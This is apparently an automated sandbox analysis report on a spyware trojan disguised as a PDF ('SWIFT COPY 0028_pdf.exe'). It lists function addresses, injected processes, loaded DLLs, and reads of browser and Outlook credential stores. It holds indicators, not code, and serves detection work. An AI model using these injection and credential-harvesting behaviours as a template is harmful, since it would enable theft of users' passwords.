                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF16CC | 2_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C85630 | 2_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D095C3 | 2_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDD5B0 | 2_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF7571 | 2_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C31460 | 2_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFF43F | 2_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB5BF0 | 2_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7DBF9 | 2_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5FB80 | 2_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFFB76 | 2_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEDAC6 | 2_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDDAAC | 2_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C85AA0 | 2_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE1AA3 | 2_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFFA49 | 2_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF7A46 | 2_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB3A6C | 2_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C49950 | 2_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5B950 | 2_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD5910 | 2_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C438E0 | 2_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAD800 | 2_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C03FD2 | 2_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C03FD5 | 2_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C41F92 | 2_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFFFB1 | 2_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFFF09 | 2_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C49EB0 | 2_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5FDC0 | 2_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C43D40 | 2_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF1D5A | 2_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF7D73 | 2_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFFCF2 | 2_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB9C32 | 2_2_03CB9C32
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DE0EDB | 3_2_02DE0EDB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DE0ED7 | 3_2_02DE0ED7
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DD878B | 3_2_02DD878B
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DDA70B | 3_2_02DDA70B
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DE2CDB | 3_2_02DE2CDB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DDA4EB | 3_2_02DDA4EB
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Code function: 3_2_02DF946B | 3_2_02DF946B
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EBE4F6 | 4_2_04EBE4F6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EC2446 | 4_2_04EC2446
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EB4420 | 4_2_04EB4420
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04ED0591 | 4_2_04ED0591
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E10535 | 4_2_04E10535
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E2C6E0 | 4_2_04E2C6E0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E0C7C0 | 4_2_04E0C7C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E10770 | 4_2_04E10770
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E34750 | 4_2_04E34750
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EA2000 | 4_2_04EA2000
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EC81CC | 4_2_04EC81CC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04ED01AA | 4_2_04ED01AA
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EC41A2 | 4_2_04EC41A2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E98158 | 4_2_04E98158
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E00100 | 4_2_04E00100
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EAA118 | 4_2_04EAA118
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E902C0 | 4_2_04E902C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EB0274 | 4_2_04EB0274
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04ED03E6 | 4_2_04ED03E6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E1E3F0 | 4_2_04E1E3F0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04ECA352 | 4_2_04ECA352
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E00CF2 | 4_2_04E00CF2
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04EB0CB5 | 4_2_04EB0CB5
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E10C00 | 4_2_04E10C00
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_04E0ADE0 | 4_2_04E0ADE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E28DBF4_2_04E28DBF
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1AD004_2_04E1AD00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EACD1F4_2_04EACD1F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECEEDB4_2_04ECEEDB
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E22E904_2_04E22E90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECCE934_2_04ECCE93
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E10E594_2_04E10E59
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECEE264_2_04ECEE26
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1CFE04_2_04E1CFE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E02FC84_2_04E02FC8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E8EFA04_2_04E8EFA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E84F404_2_04E84F40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E52F284_2_04E52F28
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E30F304_2_04E30F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB2F304_2_04EB2F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E3E8F04_2_04E3E8F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DF68B84_2_04DF68B8
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1A8404_2_04E1A840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E128404_2_04E12840
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E129A04_2_04E129A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EDA9A64_2_04EDA9A6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E269624_2_04E26962
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E0EA804_2_04E0EA80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC6BD74_2_04EC6BD7
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECAB404_2_04ECAB40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E014604_2_04E01460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF43F4_2_04ECF43F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ED95C34_2_04ED95C3
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EAD5B04_2_04EAD5B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC75714_2_04EC7571
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC16CC4_2_04EC16CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E556304_2_04E55630
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF7B04_2_04ECF7B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC70E94_2_04EC70E9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECF0E04_2_04ECF0E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E170C04_2_04E170C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EBF0CC4_2_04EBF0CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E1B1B04_2_04E1B1B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EDB16B4_2_04EDB16B
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E4516C4_2_04E4516C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DFF1724_2_04DFF172
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB12ED4_2_04EB12ED
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2B2C04_2_04E2B2C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E152A04_2_04E152A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E5739A4_2_04E5739A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04DFD34C4_2_04DFD34C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC132D4_2_04EC132D
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFCF24_2_04ECFCF2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E89C324_2_04E89C32
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2FDC04_2_04E2FDC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC7D734_2_04EC7D73
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E13D404_2_04E13D40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC1D5A4_2_04EC1D5A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E19EB04_2_04E19EB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFFB14_2_04ECFFB1
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E11F924_2_04E11F92
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFF094_2_04ECFF09
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E138E04_2_04E138E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E7D8004_2_04E7D800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E199504_2_04E19950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2B9504_2_04E2B950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EA59104_2_04EA5910
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EBDAC64_2_04EBDAC6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E55AA04_2_04E55AA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EADAAC4_2_04EADAAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EB1AA34_2_04EB1AA3
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E83A6C4_2_04E83A6C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFA494_2_04ECFA49
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04EC7A464_2_04EC7A46
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E85BF04_2_04E85BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E4DBF94_2_04E4DBF9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E2FB804_2_04E2FB80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04ECFB764_2_04ECFB76
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E622F04_2_02E622F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E7C1404_2_02E7C140
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5D3E04_2_02E5D3E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5D1C04_2_02E5D1C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E5B4604_2_02E5B460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E63BAC4_2_02E63BAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E63BB04_2_02E63BB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E659B04_2_02E659B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE4284_2_04CCE428
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE5434_2_04CCE543
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCE8DC4_2_04CCE8DC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04CCD9A84_2_04CCD9A8
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: String function: 0093EC2F appears 68 times
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: String function: 00946AC0 appears 42 times
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: String function: 0094F8A0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04E57E54 appears 111 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04DFB970 appears 280 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04E8F290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04E7EA12 appears 86 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04E45130 appears 58 times
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2157110144.0000000003A6D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY 0028_pdf.exe
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2156512538.00000000038C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY 0028_pdf.exe
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/13
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096CE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0095B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00966532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0097C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0092406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\aut7C9.tmp
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4606460151.0000000003223000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2510998129.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2513407452.0000000003200000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SWIFT COPY 0028_pdf.exe | ReversingLabs: Detection: 39%
                Source: unknown | Process created: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
                Source: C:\Windows\SysWOW64\rasautou.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasdlg.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\rasautou.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: SWIFT COPY 0028_pdf.exe | Static file information: File size 1217536 > 1048576
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SWIFT COPY 0028_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: nBMWUKLuWlMJko.exe, 00000003.00000002.4611840716.00000000006CE000.00000002.00000001.01000000.00000004.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4602403236.00000000006CE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP | source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
